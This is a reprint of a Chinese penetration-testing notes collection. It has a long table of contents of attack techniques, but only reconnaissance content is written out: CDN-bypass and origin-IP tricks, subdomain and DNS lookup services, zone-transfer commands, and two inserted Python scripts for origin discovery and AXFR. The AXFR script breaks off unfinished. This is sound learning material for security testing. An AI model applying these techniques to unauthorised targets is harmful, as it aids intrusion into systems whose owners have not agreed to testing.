
          Pentest_Note

          Source: reprinted from the internet   Date: 2024-01-29 07:51:50

          Reprint From https://github.com/xiaoy-sec/Pentest_Note

          ABOUT the Author

          • Author: 小y
          • WeChat official account: 關注安全技術

          Feel free to repost; just remember to credit the source.

          Declaration 1:

          In accordance with the Cybersecurity Law of the People's Republic of China and related regulations, no individual or organization may engage in activities that endanger network security, such as illegally intruding into other people's networks, interfering with the normal functioning of other people's networks, or stealing network data; may not provide programs or tools specifically designed for intruding into networks, interfering with normal network functions and protective measures, or stealing network data; and, knowing that others are engaged in activities that endanger network security, may not provide them with technical support, advertising, payment settlement or other assistance.

          Declaration 2:

          All of the following content was reproduced in a local environment and involves no illegal activity. Using any of the techniques mentioned in this project for illegal purposes is not permitted; the risk of using these techniques is borne entirely by the user.
          • Information gathering
            • Whois
            • Website IP
              • Is a CDN in front of it
              • Common ways to bypass a CDN
            • Historical IPs of the domain
            • Site architecture / server fingerprint / CMS identification / container
            • Subdomains
            • Official demo site of the CMS the target uses
            • SSL certificate information
            • DNS resolution history
            • Other sites on the same server
            • Sites with the same architecture or source code
            • Site JavaScript
            • Third-party JavaScript used by the site
            • Cloud information
            • App decompilation
            • Class C / Class B range information
            • Tools
            • Externally open ports
            • Directory scanning / crawling (use with care)
            • WAF identification
            • Quick casual tests
            • Search engines
            • Shodan/fofa/zoomeye
            • Google dorks
            • Information leakage
            • Web page caches
            • Reverse image search
            • Social networks
            • Add the phone number to your contacts to match the target's accounts across apps
            • Sites the target has registered on
            • Interests of the target personnel
            • Email address collection
            • Exchange
            • Verifying that an email address exists
            • Previously leaked data
            • GitHub/Gitee and other code hosting platforms
            • Lists of compromised sites
            • GPS lookup
            • URL extraction from a site
            • Honeypot detection (for reference only)
            • Default passwords
            • If registration is required
            • Company information
          • Entry points
            • Installing Kali on Windows 10 (WSL)
            • Watering-hole attacks
              • XSS clone phishing
              • Fake-page phishing
                • 1
                • 2
            • Attacking exposed services
              • Web
                • Front-end / logic flaws
                  • Registration
                  • Login
                  • Arbitrary password reset
                  • Information leakage
                  • Admin backend
                • JWT attack techniques
                  • Signature not verified
                  • Hash algorithm disabled
                  • Brute-forcing weak keys
                • XSS
                • CSRF
                • PHP arbitrary file read/download
                • PHP file inclusion
                  • Commonly used wrappers/protocols
                  • Getshell
                    • Getshell with allow_url_include on
                    • Getshell with allow_url_include off
                    • Getshell by including log files
                    • Upload a webshell as an image and include it directly
                    • When the extension is restricted
                    • phpinfo + LFI: include the temporary upload file to getshell
                    • session + LFI getshell
                    • LFI SSH Log
                    • RFI & command injection to get an MSF session
                • XML
                  • XML injection
                  • XXE
                    • Detection
                    • Discovery
                    • Reading local files with output
                    • Blind OOB XXE read without output
                    • Listing directories
                    • Protocols supported on different platforms
                    • Command execution
                    • Internal host discovery
                    • Internal port scanning
                    • Exploiting internal DTDs
                    • Linux
                    • Windows
                    • Writing a shell via XXE
                • SSRF
                  • Definition
                  • Root cause
                  • Discovery
                    • XML
                    • Databases
                    • MongoDB
                    • PostgreSQL
                    • MSSQL
                    • Image processing functions
                  • Attacks
                    • File read
                  • Port probing
                    • SSRF+Redis
                    • 302 redirect reverse shell
                    • MySQL
                    • Weblogic SSRF+Redis
                    • Ueditor SSRF
                    • Discuz
                    • Probing live hosts
                    • Mapping external assets to internal ones
                    • Bypass methods
                    • Script to convert to the gopher protocol
                    • Protocols
                    • Writing a shell via the dict protocol
                    • Copying a shell to the target via slaveof
                    • Reverse shell via slaveof
                • Fuzzing / scanning web
                  • WFuzz
                  • Cewl
                  • Dirsearch
                • Bypass WAF
                  • SQL injection with chunked transfer encoding
                  • Automatically finding usable tampers
                  • Junk data padding
                  • Upload bypass
                    • Image file header
                    • Add an image header or merge into an image and include it
                    • Extension case variation
                    • Prefix the filename with [0x09]
                    • Upload .htaccess
                    • Secondary rendering
                    • Upload php3, php4, phtml, etc.
                    • Append ::$DATA to the filename
                    • asp . (space + dot)
                    • php. . (dot + space + dot)
                    • Doubled "phphpp"
                    • Null-byte (%00) truncation
                    • Modify some fixed parameters
                    • Remove the double quotes around the filename
                    • Add a filename1 parameter
                    • Change the form variable to f+orm
                    • Remove form-data
                    • Add multiple spaces after Content-Disposition or form-data;
                    • Line break inside the quotes
                    • Swap the positions of Content-Type and Content-Disposition
                    • Prefix the filename with a space
                    • Add a space before name
                    • Add + before and after form-data
                  • ASP+IIS
                  • Asp+iis&aspx+iis
                  • Apache
                  • Case variation / keywords
                  • Double URL encoding
                  • Changing the request method
                  • HTTP parameter pollution (HPP)
                  • Databases
                    • Access
                    • MySQL
                    • MSSQL
                  • WAF
                • Unauthenticated access
                  • Redis unauthenticated access
                    • Testing
                    • Attacking the intranet from JS
                    • Reverse shell
                    • Writing a shell
                    • SSH
                    • redis-rogue-getshell
                    • redis-rogue-server
                    • Exploiting Redis on Windows
                    • Lua RCE
                  • Jenkins unauthenticated access
                  • MongoDB unauthenticated access
                  • ZooKeeper unauthenticated access
                  • Elasticsearch unauthenticated access
                  • Memcache unauthenticated access
                  • Hadoop unauthenticated access
                  • Docker unauthenticated access
                  • ActiveMQ unauthenticated access
                  • JBOSS unauthenticated access
                • Exploiting Aliyun OSS keys
                • Bypassing disable_functions on Linux
                  • LD_PRELOAD
                  • PHP 7.0-7.3 bypass
                  • Bypass via the Windows COM system component
                  • CGI startup mode
                  • Bypass via the ImageMagick component
                  • Bypass via regular functions
                  • pcntl_exec
                  • imap_open function
                  • PHP 7.4 FFI bypass
                  • shellshock
                  • AntSword plugin
                • open_basedir bypass
                • Tomcat AJP LFI & RCE
                • File read via a MySQL connection
                • Enabling remote MySQL connections
                • MSSQL & Agent Job to get a session
                • Injection without column names
                • DNSLog
                  • Injection
                    • MySQL
                    • MSSQL
                    • PostgreSQL
                    • Oracle
                  • Command execution
                  • XXE
                  • Struts
                  • WebLogic
                  • Resin
                  • Discuz
                • phpMyAdmin
                  • LOG
                  • Slow query log
                  • Arbitrary file read
                  • LFI
                  • RCE
                • PHP-FPM RCE
                • phpStudy backdoor
                • cmdhijack
              • Database
                • MSSQL
                • PostgreSQL
            • Close-access attacks
              • Wi-Fi cracking
                • wifite
                • Aircrack-ng
              • Rogue (phishing) networks
                • Hostapd
                • Hostapd-wpe
              • Wireless jamming
                • Beacon flood
                • Deauth flood
                • Mdk3 destruction
                • ESP8266 Wi-Fi chip
                • Mdk4
                • CVE-2018-4407
                • Bypassing MAC address authentication
                  • Ifconfig
                  • Macchanger
              • BadUSB
              • Card cloning
              • Bluetooth
            • Spear-phishing attacks
              • Phishing emails
                • CVE
                  • CVE-2017-11882
                  • CVE-2017-0199
                  • CVE-2012-0158
                  • CVE-2017-0143
                • Executable files
                • Forged document files
                • Extension / icon
                • Bundling
                • 0day
                • CHM
              • Phishing links
                • URL redirects
                • Combined with malicious documents or programs
                • Short URLs
                • Combined with watering-hole attacks
                • Look-alike domains
                • Domain hijacking
              • Spear-phishing via third-party services
          • AV evasion
            • MSF evasion
              • nps_payload
              • Encoders
              • C/C++ source-level evasion
                • Execution via function pointer
                • Dynamic memory allocation
                • Inline assembly
                • Forced type casting
                • Junk assembly instructions
                • XOR encryption
                • Remote thread injection
                • Loader evasion
                  • shellcode_launcher
                  • SSI loading
              • C# source-level evasion
                • Direct compilation
                • Encryption
                • XOR/AES encoding
                • CSC+InstallUtil
              • Python source-level evasion
                • PyInstaller with C code loading
                • PyInstaller with Python code loading (*)
                • Packaging an exe with py2exe
                • Base64 encoding + PyInstaller packaging
                • Separated loader
                  • hex
                  • Base64 (*)
              • DLL hijacking
              • MSBuild
              • GreatSCT
              • Mshta
              • InstallUtil
              • Veil
              • RC4
              • Bundling
              • Evasion module
              • Phantom-Evasion
              • Shellter
              • the-backdoor-factory
              • zirikatu
              • hanzoInjection
            • PowerShell evasion
              • Direct generation
              • Chunked evasion
              • Loading with Invoke-Shellcode
              • Invoke-Obfuscation
              • Xencrypt
              • PyFuscation
              • Split + compile with C
              • Behavioural detection
              • Out-EncryptedScript
              • Cobalt Strike PowerShell evasion
            • Ruby
            • Golang
              • Loaders
                • go-shellcode
                • Gsl
          • Intranet & domain
            • Powershell
              • Remote execution
              • Loading an exe
              • EXE2PS1
              • Bypassing the execution policy
                • Base64
                • Bypass by writing a .bat
                • Splitting and concatenating strings
                • The replace function
                • Bypass via HTTP string concatenation
                • Evasion via images
                • Loading shellcode
                • Loading a DLL
            • Windows security identifiers (SID)
            • Privilege escalation
              • Impacket toolkit
              • Windows-exploit-suggester
              • Wesng
              • Searchsploit
              • Enabling the guest account
              • MySQL UDF
              • MySQL Linux root
              • MSSQL
                • xp_cmdshell
                • xp_regwrite
                • xp_dirtree
                • sp_oacreate
                • Sandbox execution
                • WarSQLKit (backdoor)
              • MSF
              • Bypass UAC
                • MSF
                • DccwBypassUAC
                • K8uac
                • CMSTP
                • Uacme
                • Bypass-UAC
                • DLL hijack
                • SilentCleanup
                • Sdclt
                  • 1
                  • 2
                • Makecab&Wusa
                • CLR BypassUAC
                • eventvwr registry hijack
                • Web Delivery
                • Invoke-PsUACme
              • Whitelist (allow-listed binaries)
                • GreatSCT
                • JSRat
                • Odbcconf.exe
                • Msiexec.exe
                • InstallUtil.exe
                • Compiler.exe
                  • 1.xml
                  • 1.tcp
                • Csc
                • Regasm
                • Msbuild
                • Winrm
                • Mshta
                • Regsvr32
                • Rundll32
                  • Executing a file
                  • Execution without a pop-up window
                  • Adding/removing registry keys
                  • Writing a file
                  • Out-RundllCommand
                • DotNetToJScript
                  • StarFighters
                  • Execution with AMSI bypass
                • WMIC
                • Msxsl
                • CPL
              • Runas
              • Token theft
                • MSF
                • Cobalt strike
              • Password theft
                • Fake lock screen
                • Fake authentication prompt
                  • CredsLeaker
                  • LoginPrompt
                  • Nishang-Invoke-CredentialsPhish
              • RottenPotato
              • PowerUp
              • Powerup-AlwaysInstallElevated
              • AlwaysInstallElevated privilege escalation
              • Trusted Service Paths
              • Vulnerable Services
              • Sudo privilege escalation
              • Linux scheduled tasks (cron)
              • Linux SUID privilege escalation
                • Find
                • NMAP
                • VIM
                • BASH
                • CP/MV
              • Linux /etc/passwd privilege escalation
              • Linux Dirty COW privilege escalation
            • RDP & Firewall
              • Brute forcing
              • Enabling via the registry
              • Starting the service with netsh
              • Enabling via an injection point
              • Enabling via MSF
              • Enabling via WMIC
              • Firewall
              • Multi-user login
              • RDP connection history
              • Removing traces
            • Port mapping & forwarding
              • MSF
              • lcx.exe
              • SSH
                • Local (forward) forwarding
                • Remote (reverse) forwarding
              • Invoke-SocksProxy
              • SSF
                • Single-hop forward forwarding
                • Single-hop reverse forwarding
              • Netsh
              • Iptables
              • chisel
            • Command & control
              • Interactive shell
              • script reverse shell
                • bash
                • nc
                • telnet
                • php
                • python
                • perl
                • ruby
              • OpenSSL encrypt shell
                • Linux
                • Windows
              • Dnscat2
                • Powercat
                • Dnscat2 exe
              • DNS TXT Command
              • Powershell
                • MSF+Powershell
                • Powercat
                • Nishang
                  • Bind shell
                  • Reverse shell
                  • UDP reverse shell
                  • HTTPS
                  • ICMP
                • Base64
              • Metasploit
                • Basic usage
                • Tips and tricks
                • Modules
                  • Auxiliary
                  • Payload
                    • Windows
                    • Linux
                    • MacOS
                    • Web
                    • Android
                    • shellcode
                    • Setting up an MSF listener
                • Meterpreter
                  • Interaction
                  • Privilege escalation
                  • Commands
                  • File operations
                  • Post-exploitation & persistence
                  • Clearing logs
                • Spawning Cobalt Strike and Empire sessions from MSF
                  • Spawn to Empire
                  • Spawn to Cobalt Strike
              • Empire
                • Installation
                • Listeners
                • Generating stagers
                • Connecting to the target and other operations
                • Privilege escalation
                • Lateral movement
                  • Token theft
                  • Session injection
                  • Pass-the-hash
                • Backdoors & persistence
                  • Image File Execution Options hijacking
                  • Injecting a registry run key
                  • Scheduled tasks
                  • WMI
                  • Injecting an SSP
                • Collection
                • Code_execution
                • Credentials
                • Exfiltration
                • Exploitation
                • Lateral_movement
                • Management
                • Persistence
                • Privesc
                • Recon
                • Situational_awareness
                • Trollsploit (pranks)
                • Empire Word
                • Spawning Cobalt Strike and MSF sessions from Empire
                  • Spawn to MSF
                  • Spawn to Cobalt Strike
              • Cobalt Strike
                • Installation
                • Deploying the TeamServer
                • Modules
                • Connecting
                • Listeners
                • Attack modules
                • View modules
                • Interaction
                • Beacon
                • Cloning a website
                • Office macros
                • Phishing emails
                • Loading scripts
                • Browser pivoting
                • Persistence
                • Lateral movement
                • Isolated networks
                  • Pivoting through a compromised host
                  • SMB_beacon
                  • SSH login
                • Proxies
                • Deploying a VPN
                • Spawning Empire and MSF sessions from Cobalt Strike
                  • Spawn to Empire
                  • Spawn to MSF
              • JSRat
              • CrackMapExec
                • Information gathering
                • Brute forcing
                • Available modules
                • PTH
                • Executing commands
              • koadic
              • SILENTTRINITY
              • Browser C2
              • DropBox C2
              • Gmail C2
                • Gcat
                • Gdog
              • Telegram C2
            • Information gathering
              • Cmd
              • Wmi
              • PowerView
              • Linux
            • HTTP services
            • File operations
              • Finding files on Windows
              • Finding files on Linux
              • Creating
              • Compressing
              • Extracting
              • Transferring
                • FTP
                • VBS
                • JS
                • Bitsadmin
                • Powershell
                  • 1
                  • 2
                  • 3
                  • 4
                  • 5
                • Certutil
                • Python
                • Perl
                • PHP
                • Curl
                • wget
                • nc
                • SCP
            • Hashes & passwords
              • Online cracking sites
              • Cracking hashes with Google Colab
              • Password policy
              • Enabling WDigest
                • Cmd
                • powershell
                • meterpreter
              • Getpass
              • QuarksPwDump
              • MSF
              • Empire
              • Invoke-Dcsync
              • Mimikatz
                • Remote credential dumping with mimikatz
                • Bulk hash dumping across hosts
                  • Schtasks
                  • Wmic
                • Direct use
                • Powershell Bypass
                • .net 2.0
                • .net 4.0 Msbuild
                • JScript
                • Procdump64+mimikatz
                • Dumpert
                • Dumping LSASS via Cisco Jabber
                • Bypassing Kaspersky
                • Remote LSASS dump with Physmem2profit
                • SqlDumper+mimikatz
                • Mimipenguin
              • Extracting cached hashes
                • Registry
                • Ninjacopy
                • Quarks-pwdump
              • Extracting domain hashes
                • Ntdsutil
                • Vssadmin
                • Impacket
                • NTDSDumpex
                • Calling Vssadmin via WMI
                • PowerSploit
                • Nishang
                • Mimikatz
                • MSF
              • laZagne
                • windows
                • Linux
              • Sensitive information
                • Seatbelt
                • VNC passwords
                • Navicat information
                • Passwords saved in Chrome
                • Foxmail
                • Passwords saved in Firefox
                • SecureCRT
            • Lateral movement
              • Discovering live hosts
                • Live host discovery with for + ping
                • NbtScan
                • NMAP
                  • Nmap scanning through a proxy
                • NetDiscover
                • rp-scan
                • MSF
              • Discovering services & ports
                • Powershell
                  • Powersploit
                  • Nishang
                • SMB
                  • MSF
                  • NMAP
                  • CMD
                • Linux Samba service
                • MSF
                  • Ports
                  • Services
                • Nc
                • Masscan
                • PTScan
                • CobaltStrike+K8 Aggressor
                  • Live hosts
                  • MS17010
                  • OS information
                  • Internal site banner and title scanning
                  • FTP brute forcing
                  • Brute-forcing Windows account passwords over WMI
                  • Cisco device scanning
                  • Enumerating shares
                  • Enumerating SQL Server databases
              • Command execution & IPC$ & scheduled tasks
                • AT
                • Schtasks
                • WMIC
              • Quickly locating machines where domain admins have logged in
              • Adding routes in MSF
              • MSF named-pipe listener
              • Proxies
                • SSH
                  • Forward proxy
                  • Reverse proxy
                  • SSH tunnel + RC4 double encryption
                  • Public SSH tunnel + local MSF
                • socks4a
                • socks5
                • Web-based SOCKS5
                  • reGeorg
                  • Neo-reGeorg
                  • ABPTTS port forwarding
                  • Tunna forwarding
                • Earthworm
                  • Forward (target has a public IP):
                  • Reverse SOCKS5 (target has no public IP):
                  • Two-tier environment (A has internet access, B is internal with no internet access):
                  • Two-tier environment (A has no internet access, B is internal with no internet access):
                  • Three-tier environment (A has no internet access, B is internal with no internet access and reaches A, C reaches B):
                • Frp
                • SSF
                  • Forward SOCKS proxy
                  • Reverse SOCKS proxy
                  • Multi-level chaining
                  • Reverse shell
                • Sass
                • Goproxy
                • Chisel
                • Proxy client software
              • Ngrok tunnelling
              • MS17-010
              • MS08_067
              • Attacking MySQL databases
              • Attacking MSSQL databases
              • Payloads for isolated hosts
              • Brute forcing
                • Hydra
                • Medusa
                • Brute forcing inside the domain
                  • Kerbrute
                  • DomainPasswordSpray
              • Equation Group tools on the intranet without producing a session
              • Kerberoasting
                • SPN discovery
                  • cmd
                  • Powershell
                  • Empire
                • Requesting tickets
                • Exporting tickets
                • Cracking the password
                • Rewriting tickets
                • GetUserSPNs
              • AS-REP Roasting
              • PASS-THE-HASH
                • WMIExec & TheHash
                • WMI
                  • wmiexec.py
                  • wmiexec.vbs
                  • Powershell
                • Psexec
                • Mimikatz
                • pth-winexe
                • Smbexec
              • PASS-THE-TICKET
                • Terminology
                • Golden ticket + Mimikatz
                • Silver ticket + Mimikatz
                • MS14-068
                • Mimikatz+MSF
                • goldenPac.py
              • Account delegation
                • Unconstrained delegation
                • Constrained delegation
              • Resource-based constrained delegation
              • CVE-2019-0708
              • NTLM relay
                • Ntlmrelayx + resource-based constrained delegation
                • Responder
                  • SMB capture
                  • WPAD proxy spoofing
                  • Web vulnerabilities
                  • Relay attacks
                  • Cracking NTLMv2 hashes
              • GPP-Password
              • Fileless execution via WinRM
              • Commands to add a domain admin
              • Passwordless SSH login with keys
              • Retrieving saved RDP passwords
            • Backdoors & persistence
              • Shadow (hidden) users
              • RID hijacking
              • Enabling Guest
              • Image File Execution Options hijacking
                • Sethc
                • Ease of Access
                • IFEO silent execution
              • Registry run keys
                • MSF
                • CMD
              • Scheduled tasks
                • Loading PowerShell
                • Executing an exe
              • Process injection
                • AppCertDlls
                • AppInit_DLLs
                • MSF
              • Logon initialization
                • Screensaver
              • MOF
              • WinRM port reuse
              • Creating a service
              • Bitsadmin
              • CLR Injection
              • COM OBJECT hijacking
                • CAccPropServicesClass and MMDeviceEnumerator
                • Explorer
              • Squiblydoo
              • DLL hijacking
                • Hijack 1
                • Hijack 2
                • MSDTC service hijacking
                • Rattler
              • DLL proxy hijacking of the right-click menu
              • Persistence via the AMSI scan interface
              • DLL hijacking of scheduled tasks
              • DLL injection
                • Powershell
                • InjectProc
              • Persistence via Control Panel items
              • DLL injection via a custom .NET garbage collector
              • Windows FAX DLL Injection
              • DSRM + registry ACL backdoor
              • DCShadow&SID History
              • DCSync backdoor
              • Netsh Helper DLL
                • Generating a DLL with msfvenom
                • MSF+web_delivery
                • MSF&Shellcode
              • MSSQL backdoor
              • NSSM
              • Adding a signature
              • Metsvc
              • Persistence
              • HookPasswordChangeNotify
              • Logging passwords with NPPSpy
              • Password Filter DLL
              • WMIC event subscription
              • WMI-Persistence
              • Invoke-Tasksbackdoor
              • Invoke-ADSBackdoor
              • Hiding a webshell in ADS
              • ADS&JavaScript
              • Empire
                • LNK backdoor
                • WMI
              • Injecting an SSP to passively collect passwords
                • Mimikatz
                • Empire
                • Powersploit
              • Backdoor via group policy file permissions
              • Kerberoasting backdoor
              • S4U2Self backdoor
              • Constrained delegation backdoor
              • Skeleton Key
              • Single-IP access restriction
              • Linux cron backdoor
              • Logging SSH passwords with strace
              • SSHD backdoor
              • Process injection
              • SSH wrapper backdoor
              • SUID Shell
              • SSH key-pair login
              • Reptile
              • Kbeast_rootkit
              • OpenSSH backdoor
              • iptables port reuse
              • File handling
              • IIS_Bin_Backdoor
              • IIS_NETDLL_Spy
              • IIS_RAID
              • JAVA Web Backdoor
              • Tomcat JSP HideShell
              • Apache module backdoor 1
              • Apache module backdoor 2
              • Apache module backdoor 3
              • Nginx Lua backdoor
              • PwnNginx
          • Pentest and red team tips
            • Parent process destruction
            • IoT high-frequency account passwords
            • Bypass mod_security
            • Wordlist for finding git and svn
            • Top 25 redirect dorks
            • Quickly stripping junk data with grep
            • Wordlists compiled from leaked passwords
            • Command injection bypass
            • Checking for the Heartbleed vulnerability
            • Extracting files remotely
            • Top 25 SSRF dorks
            • Querying subdomains with the SecurityTrails API
            • Email address payloads
            • Web server log analysis commands
            • Bypass AMSI
            • Bypass AMSI 2
            • CVE-2020-5902
            • Some execution methods worth trying to bypass whitelisting
            • Bypassing LSA protection
            • Pezor evasion
            • Process injection logic via dynamic invocation
            • Bypassing Windows Defender on Windows Server 2016 and 2019
            • Decoding shellcode in memory to bypass AV
            • cshot remote shellcode loader
            • ThinkPHP pentest techniques
            • Downloading files with Windows Defender
            • PowerShell script obfuscation to bypass AMSI and AV
            • Disabling Windows event logging by suspending the EventLog service threads
            • DedeCMS
            • DedeCMS front-end arbitrary admin password reset
            • Shiro rememberMe deserialization vulnerability
            • Shiro Padding Oracle Attack
            • Shiro authorization bypass
            • Editor vulnerabilities
            • BT (Baota) panel unauthenticated phpMyAdmin access
            • Sangfor
            • From LFI to RCE
            • Hiding Windows services

          Information gathering

          Whois

          Other sites registered by the site's registrant (reverse lookup on the registrant name, email address and phone number), then dig into the sites found.

          Website IP

          Is a CDN in front of it

          Ping, ping from multiple locations, ping from abroad (a CDN answers with different edge addresses depending on where you ask from).

          Common ways to bypass a CDN

          • Subdomains: https://dnsdb.io/zh-cn/ (the CDN is often only in front of the main site)
          • Ping the root domain
          • Nslookup
          • Finding the real IP behind Cloudflare
            • http://crimeflare.org:82/cfs.html
            • https://github.com/gwen001/pentest-tools/blob/master/cloudflare-origin-ip.py
          • Look for old domains
          • Look for related domains: www.baidu.com, www.baidu.cn, www.baidu.org, www.baidu.xyz, and so on
          • Information leakage / configuration files: phpinfo, page source, SVN, GitHub
          • Shodan/fofa/zoomeye
          • SSL certificate records: https://censys.io/
          • Website vulnerabilities: XSS, SSRF, command execution, SQL injection (in some cases load_file can read the Linux IP configuration, the hosts file, etc.)
          • DNS records and certificate records
          • Set X-Forwarded-For / X-Remote-IP / X-Remote-Addr to 127.0.0.1 or an IPv6 address
          • RSS feeds / mail headers (the server that sends mail is often the origin)
          • Decompile the app and search for / intercept the app's request information
          • Edit the hosts file to point the domain at the candidate IP and see whether the site still serves
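          The multi-vantage comparison and the "old IP" trick above reduce to a small decision routine. The following is an added example, not code from Pentest_Note: the resolver observations, the DNS history and the CDN_RANGES table are constructed placeholders (RFC 5737 documentation addresses), and resolve_local is the only part that touches the network.

```python
"""Multi-vantage CDN check (added example; not part of the original notes).

Assumptions (labelled): OBSERVATIONS, HISTORY and CDN_RANGES below are
constructed for illustration. A real run replaces OBSERVATIONS with answers
collected from several vantage points (multi-location ping, foreign ping,
different public resolvers) and CDN_RANGES with the providers' published ranges.
"""
from __future__ import annotations

import ipaddress
import socket
import sys

# Constructed sample of CDN address ranges (documentation prefixes, not real CDNs).
CDN_RANGES = {
    "example-cdn-a": ["203.0.113.0/24"],
    "example-cdn-b": ["198.51.100.0/25"],
}


def cdn_owner(ip: str, ranges: dict[str, list[str]] = CDN_RANGES) -> str | None:
    """Return the CDN name whose published range contains `ip`, or None."""
    addr = ipaddress.ip_address(ip)
    for name, cidrs in ranges.items():
        if any(addr in ipaddress.ip_network(c) for c in cidrs):
            return name
    return None


def cdn_verdict(observations: dict[str, set[str]], ranges=CDN_RANGES) -> dict:
    """Decide whether a host sits behind a CDN from per-vantage A-record sets.

    A CDN usually answers with different edge IPs per vantage and/or with IPs
    inside known CDN ranges; one stable IP outside those ranges is most
    likely the origin itself.
    """
    all_ips = set().union(*observations.values()) if observations else set()
    owners = {ip: cdn_owner(ip, ranges) for ip in all_ips}
    varies = len({frozenset(v) for v in observations.values()}) > 1
    in_cdn = {ip for ip, owner in owners.items() if owner}
    return {
        "all_ips": sorted(all_ips),
        "varies_by_vantage": varies,
        "cdn_ips": sorted(in_cdn),
        "likely_cdn": varies or bool(in_cdn),
        "candidate_origins": sorted(all_ips - in_cdn),
    }


def origin_candidates(history: list[str], current: set[str], ranges=CDN_RANGES) -> list[str]:
    """Historical IPs that are neither CDN edges nor still in the current answers.

    This is the 'historical IP / DNS history' trick: an address the domain
    pointed at before the CDN was put in front is a strong origin candidate.
    """
    return sorted({ip for ip in history if ip not in current and cdn_owner(ip, ranges) is None})


def resolve_local(host: str) -> set[str]:
    """Live resolution through this machine's resolver (one vantage point)."""
    return set(socket.gethostbyname_ex(host)[2])


# Constructed observations: two vantages disagree and every answer is a CDN edge.
OBSERVATIONS = {
    "local": {"203.0.113.10", "203.0.113.11"},
    "abroad": {"198.51.100.7"},
}
# Constructed DNS history: one pre-CDN address survives in the record.
HISTORY = ["203.0.113.10", "192.0.2.44"]

if __name__ == "__main__":
    # With a hostname argument, use the live local vantage only; otherwise the constructed data.
    obs = {"local-live": resolve_local(sys.argv[1])} if len(sys.argv) > 1 else OBSERVATIONS
    verdict = cdn_verdict(obs)
    print(verdict)
    print("origin candidates from history:", origin_candidates(HISTORY, set(verdict["all_ips"])))
```

          Feed it the per-vantage answer sets you already collect by hand; the interesting output is `candidate_origins` (addresses outside every CDN range) and whatever `origin_candidates` pulls out of the history, which is exactly what the hosts-file test in the last bullet should be pointed at.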

          Historical IPs of the domain

          https://x.threatbook.cn/

          Site architecture / server fingerprint / CMS identification / container

          • Whatweb
          • Page source
          • Request / response headers
          • Site footer, header, top-left and top-right corners
          • Site error messages
          • http://www.yunsee.cn/
          • domain/install
          • Firefox add-on Wappalyzer
          • CMS vulnerabilities: pin down the version and check it against known vulnerabilities; hunt for unknown CMS vulnerabilities
          • Known web container vulnerabilities (parsing vulnerabilities and the like)
          • Show the technologies the site uses: https://builtwith.com/
          • Middleware and components: WebLogic, Tomcat, Zabbix, Struts, Axis, etc.
          • https://github.com/FortyNorthSecurity/EyeWitness

          Subdomains

          • Old sites, sub-sites with the same architecture or the same source code
          • Brute forcing, API queries
            • https://phpinfo.me/domain/
            • https://d.chinacycc.com/index.php?m=Login&a=index
            • subDomainBrute, knockpy
          • OWA discovery: dig adfs, dig mail
          • https://dns.bufferover.run/dns?q=baidu.com
          • http://api.hackertarget.com/reversedns/?q=target.com

          Official demo site of the CMS the target uses

          If you cannot find a demo, find the source code's developers, join their chat groups and so on, and use a little social engineering to get a screenshot of the admin backend (useful for CMSes with complicated backend directory layouts). Also look closely at the screenshots in the feature descriptions on the site.

          SSL certificate information

          • https://crt.sh/?q=%25.target.com
          • https://censys.io/certificates?q=target.com
          • https://github.com/cheetz/sslScrape

          DNS resolution history

          • https://dnsdumpster.com/
          • https://censys.io/
          • https://securitytrails.com/
          • Zone transfer check: dnsenum, fierce (http://ha.ckers.org/fierce/)
            $ ./fierce.pl -dns example.com
            $ ./fierce.pl -dns example.com -wordlist myWordList.txt
            > dig @ns.example.com example.com AXFR
            > nslookup -type=ns xxx.yyy.cn    # find the name servers authoritative for the domain
            > nslookup                        # enter nslookup interactive mode
            > server dns.domain.com           # point at one of those name servers
            > ls xxx.yyy.cn                   # list the zone (only works if the server allows transfers)
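          The zone-transfer check that dig and fierce perform can be done without a DNS library. The following is an added example rather than code from the notes or from fierce: it implements only what an AXFR probe needs (the query, name decompression and a walk over the answer stream until the closing SOA), and SAMPLE_OPEN / SAMPLE_REFUSED are hand-built responses used to exercise the parser offline, not captures from any real server.

```python
"""Zone-transfer (AXFR) check in pure Python (added example; not from the notes).

Sends the same question `dig @ns example.com AXFR` sends, over TCP, and walks
the answer messages until the second SOA that closes a transfer. Assumption
(labelled): SAMPLE_OPEN and SAMPLE_REFUSED below are constructed by hand.
"""
from __future__ import annotations

import socket
import struct
import sys

QTYPE_AXFR, QTYPE_SOA, QTYPE_A = 252, 6, 1


def build_query(zone: str, qtype: int = QTYPE_AXFR, txid: int = 0x1234) -> bytes:
    """DNS header + one question for `zone` (no TCP length prefix)."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)   # flags 0: plain query, RD off
    labels = zone.strip(".").split(".")
    qname = b"".join(bytes([len(lb)]) + lb.encode("ascii") for lb in labels) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, 1)     # QCLASS IN


def read_name(msg: bytes, off: int) -> tuple[str, int]:
    """Decode a possibly compressed name; return (name, offset just after it)."""
    labels, end, jumped = [], off, False
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                            # two-byte compression pointer
            if not jumped:
                end = off + 2                                # the name ends after the first pointer
            off, jumped = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF, True
            continue
        if length == 0:
            off += 1
            break
        labels.append(msg[off + 1:off + 1 + length].decode("ascii"))
        off += 1 + length
    return ".".join(labels), (end if jumped else off)


def parse_message(msg: bytes) -> dict:
    """Return the RCODE and [(owner, type), ...] for every answer RR in one message."""
    _, flags, qd, an, _, _ = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):                                      # skip the echoed question section
        _, off = read_name(msg, off)
        off += 4                                             # QTYPE + QCLASS
    answers = []
    for _ in range(an):
        name, off = read_name(msg, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", msg[off:off + 10])   # TYPE CLASS TTL RDLENGTH
        off += 10 + rdlen                                    # RDATA is not decoded here
        answers.append((name, rtype))
    return {"rcode": flags & 0xF, "answers": answers}


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("server closed the connection mid-transfer")
        buf += chunk
    return buf


def axfr(zone: str, nameserver: str, port: int = 53, timeout: float = 5.0):
    """Try a zone transfer; return the RR list, or None if the server refuses."""
    query = build_query(zone)
    records, soa_seen = [], 0
    with socket.create_connection((nameserver, port), timeout=timeout) as s:
        s.sendall(struct.pack("!H", len(query)) + query)    # TCP DNS: 2-byte length prefix
        while soa_seen < 2:                                 # a complete transfer is SOA ... SOA
            size = struct.unpack("!H", _recv_exact(s, 2))[0]
            parsed = parse_message(_recv_exact(s, size))
            if parsed["rcode"] != 0 or not parsed["answers"]:
                return None                                  # REFUSED / NOTAUTH / nothing returned
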